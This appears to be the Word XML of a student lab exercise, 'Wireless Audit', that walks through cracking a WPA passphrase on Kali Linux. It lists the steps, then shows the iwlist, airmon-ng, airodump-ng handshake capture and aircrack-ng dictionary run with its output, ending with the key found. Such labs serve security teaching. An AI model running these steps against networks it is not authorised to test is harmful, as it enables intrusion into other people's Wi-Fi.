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E991D" w14:textId="5BC307D2" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7965"/>
        </w:tabs>
        <w:spacing w:before="71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 No.: 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Date:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7124CD71" w14:textId="77777777" w:rsidR="0011262E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123" w:right="1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WIRELESS AUDIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEA5513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7CE7877" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0011262E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="2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F060C6" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="9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6DBA8480" w14:textId="395BC0A8" w:rsidR="0011262E" w:rsidRDefault="00000000" w:rsidP="00B47B90">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="2" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="10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perform wireless audit on Access Point and decrypt WPA keys using aircrack-ng tool in</w:t>
      </w:r>
      <w:r w:rsidR="00B47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Kali</w:t>
      </w:r>
      <w:r w:rsidR="00B47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linux OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277A2481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72209" w14:textId="77777777" w:rsidR="0011262E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F417D73" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="602"/>
        </w:tabs>
        <w:spacing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Check the current wireless interface with iwconfig command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7677DF" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="602"/>
        </w:tabs>
        <w:spacing w:before="137"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Get the channel number, MAC address and ESSID with iwlist command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E190B6" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="602"/>
        </w:tabs>
        <w:spacing w:before="137"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Start the wireless interface in monitor mode on specific AP channel with airmon-ng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357962C5" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="602"/>
        </w:tabs>
        <w:spacing w:before="140"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If processes are interfering with airmon-ng then kill those process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCEF271" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="587"/>
        </w:tabs>
        <w:spacing w:before="136" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="586" w:hanging="286"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Again start the wireless interface in monitor mode on specific AP channel withairmon-ng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A37887A" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="602"/>
        </w:tabs>
        <w:spacing w:before="140"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Start airodump-ng to capture Initialization Vectors(IVs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7BAFB3" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="602"/>
        </w:tabs>
        <w:spacing w:before="136"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Capture IVs for atleast 5 to 10 minutes and then press Ctrl + C to stop the operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071037C7" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="602"/>
        </w:tabs>
        <w:spacing w:before="140"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List the files to see the captured files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438874A" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="602"/>
        </w:tabs>
        <w:spacing w:before="136"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Run aircrack-ng to crack key using the IVs collected and using the dictionary file rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AAEBFC" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:spacing w:before="142" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="661" w:right="314" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If the passphrase is found in dictionary then Key Found message displayed; else print Key Not Found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532C1509" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0011262E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D2FE916" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0000000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20DE3A3" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0011262E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="11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39E2943F" w14:textId="77777777" w:rsidR="0011262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root@kali:~# iwconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445DF8EC" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1071"/>
        </w:tabs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eth0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wireless extensions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64234CE0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910BB" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1213"/>
        </w:tabs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wlan0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IEEE 802.11bgn ESSID:off/any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4313AA3A" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="901" w:right="26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Mode:Managed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64765A2B" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="901" w:right="68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Encryption key:off Power Management:off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6E216D" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="965"/>
        </w:tabs>
        <w:spacing w:before="1"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wireless extensions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B052B77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1380A" w14:textId="77777777" w:rsidR="0011262E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root@kali:~# iwlist wlan0 scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAFC03C" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1184"/>
        </w:tabs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wlan0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Scan completed :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E8727" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="9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Cell 01 -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Address: 14:F6:5A:F4:57:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5443B656" w14:textId="77777777" w:rsidR="0011262E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15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Channel:6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B6F2E9" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1501" w:right="495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Frequency:2.437 GHz (Channel 6) Quality=70/70 Signal level=-27 dBm Encryption key:on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ESSID:"BENEDICT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39919D2D" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="15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Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22479A98" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="15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Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30028B7E" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2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36 Mb/s; 48 Mb/s; 54 Mb/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE252E" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="71" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1501" w:right="5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Mode:Master </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Extra:tsf=00000000425b0a37 Extra: Last beacon: 548ms ago IE: WPA Version 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD54FB1" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="17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Cipher : TKIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655F2E69" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1726" w:right="4882" w:firstLine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Pairwise Ciphers (2) : CCMP TKIP Authentication Suites (1) : PSK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F846EC1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99836" w14:textId="77777777" w:rsidR="0011262E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root@kali:~# airmon-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D712F01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4F59A" w14:textId="77777777" w:rsidR="0011262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Found 2 processes that could cause trouble.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EF16A6" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="301" w:right="39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airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D44A1E4" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0011262E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before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37B87" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="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 Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A69965" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240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1148 NetworkManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6757B019" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240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1324 wpa_supplicant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0BAB51" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0011262E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a"/>
        <w:tblW w:w="86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42"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="5092"/>
      </w:tblGrid>
      <w:tr w:rsidR="0011262E" w14:paraId="2DB831BD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="268"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2042" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CB7FC0C" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="907"/>
              </w:tabs>
              <w:spacing w:line="248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Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="594D25FC" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="248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Driver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5092" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FB71547" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="248" w:lineRule="auto"/>
              <w:ind w:left="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</w:tr>
      <w:tr w:rsidR="0011262E" w14:paraId="7E07A674" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="268"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2042" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E58FDB3" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="907"/>
              </w:tabs>
              <w:spacing w:line="248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wlan0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07096DEF" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="248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ath9k_htc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5092" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FCB1C41" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="248" w:lineRule="auto"/>
              <w:ind w:left="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Atheros Communications, Inc. AR9271 802.11n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06899CDE" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0011262E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68539357" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="301" w:right="22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Newly created monitor mode interface wlan0mon is *NOT* in monitor mode. Removing non-monitor wlan0mon interface...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69484E43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F627E" w14:textId="77777777" w:rsidR="0011262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WARNING: unable to start monitor mode, please run "airmon-ng check kill"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA242CF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9BA2B" w14:textId="77777777" w:rsidR="0011262E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root@kali:~# airmon-ng check kill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3397DB97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FECC5" w14:textId="77777777" w:rsidR="0011262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Killing these processes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB3542" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0011262E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3AF6E9D6" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="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 Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D758DCF" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3" w:line="240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1324 wpa_supplicant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CE1A97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EC4E9" w14:textId="77777777" w:rsidR="0011262E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root@kali:~# airmon-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F34DF02" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0011262E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="9" w:after="1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tbl>
      <w:tblPr>
        <w:tblStyle w:val="a0"/>
        <w:tblW w:w="86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42"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="5092"/>
      </w:tblGrid>
      <w:tr w:rsidR="0011262E" w14:paraId="2A6F067A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="268"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2042" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A5C2AB0" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="907"/>
              </w:tabs>
              <w:spacing w:line="248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Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CDE8F68" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="248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Driver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5092" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31307115" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="248" w:lineRule="auto"/>
              <w:ind w:left="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</w:tr>
      <w:tr w:rsidR="0011262E" w14:paraId="6BBE8588" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="268"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2042" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0058339E" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="907"/>
              </w:tabs>
              <w:spacing w:line="248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wlan0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52C0D7D7" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="248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ath9k_htc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5092" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B2529B9" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="248" w:lineRule="auto"/>
              <w:ind w:left="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Atheros Communications, Inc. AR9271 802.11n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07159EC2" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0011262E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63781EC3" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1717" w:right="8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(mac80211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monitor mode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vif enabled for [phy0]wlan0 on [phy0]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wlan0mon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) (mac80211 station mode vif disabled for [phy0]wlan0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12411814" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="73" w:line="477" w:lineRule="auto"/>
        <w:ind w:left="301" w:right="15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root@kali:~# airodump-ng -w atheros -c 6 --bssid 14:F6:5A:F4:57:22 wlan0mon CH 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][ Elapsed: 5 mins ][ 2016-10-05 01:35 ][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WPA handshake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 14:F6:5A:F4:57:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664566B1" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2428"/>
          <w:tab w:val="left" w:pos="3136"/>
          <w:tab w:val="left" w:pos="3796"/>
          <w:tab w:val="left" w:pos="4816"/>
          <w:tab w:val="left" w:pos="4854"/>
          <w:tab w:val="left" w:pos="5694"/>
          <w:tab w:val="left" w:pos="6414"/>
        </w:tabs>
        <w:spacing w:before="4" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="361" w:right="10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BSSID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PWR   RXQ Beacons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#Data, #/s CH MB ENC CIPHER AUTH E 14:F6:5A:F4:57:22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-31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3104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10036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0   6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54e. WPA CCMP PSK B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8193AF" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2428"/>
          <w:tab w:val="left" w:pos="4554"/>
          <w:tab w:val="left" w:pos="5114"/>
          <w:tab w:val="left" w:pos="5932"/>
          <w:tab w:val="left" w:pos="5973"/>
          <w:tab w:val="left" w:pos="6599"/>
          <w:tab w:val="left" w:pos="6681"/>
          <w:tab w:val="right" w:pos="7989"/>
        </w:tabs>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="361" w:right="20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BSSID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PWR Rate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Lost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Frames Probe 14:F6:5A:F4:57:22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70:05:14:A3:7E:3E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-32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2e-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10836</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B4BF4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DD65D" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="0000000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root@kali:~# ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC5780A" w14:textId="77777777" w:rsidR="0011262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10348</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9AF1B3" w14:textId="77777777" w:rsidR="0011262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-rw-r--r-- 1 root root 10580359 Oct 5 01:35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atheros-01.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5237203D" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs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-rw-r--r-- 1 root root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481 Oct 5 01:35 atheros-01.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DCB78D" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs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-rw-r--r-- 1 root root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598 Oct 5 01:35 atheros-01.kismet.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597A6B92" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2555"/>
        </w:tabs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-rw-r--r-- 1 root root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2796 Oct 5 01:35 atheros-01.kismet.netxml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487DA797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79326BF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3422D88" w14:textId="77777777" w:rsidR="0011262E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root@kali:~# aircrack-ng -a 2 atheros-01.cap -w /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD95A1A" w14:textId="77777777" w:rsidR="0011262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[00:00:52] 84564 keys tested (1648.11 k/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59626AEB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C9130" w14:textId="77777777" w:rsidR="0011262E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191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FOUND! [ rec12345 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4AB3C9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FD539" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2084"/>
          <w:tab w:val="left" w:pos="2428"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2428" w:right="2340" w:hanging="17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 Key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 53 9B 5C 23 16 70 E4 84 53 16 9E FB 14 77 49 A9 7AA0 2D 9F BB 2B C3 8D 26 D2 33 54 3D 3A 43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C03D62F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C80E5" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="6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Transient Key : F5 F4 BA AF 57 6F 87 04 58 02 ED 18 62 37 8A 53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E29B764" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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38 86 F1 A2 CA 0D 4A 8D D6 EC ED 0D 6C 1D C1 AF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D6E3E" w14:textId="77777777" w:rsidR="0011262E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2257" w:right="24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81 58 81 C2 5D 58 7F FA DE 13 34 D6 A2 AE FE 05 F6 53 B8 CA A0 70 EC 02 1B EA 5F 7A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 7A EC 7D</w:t>
      </w:r>
    </w:p>
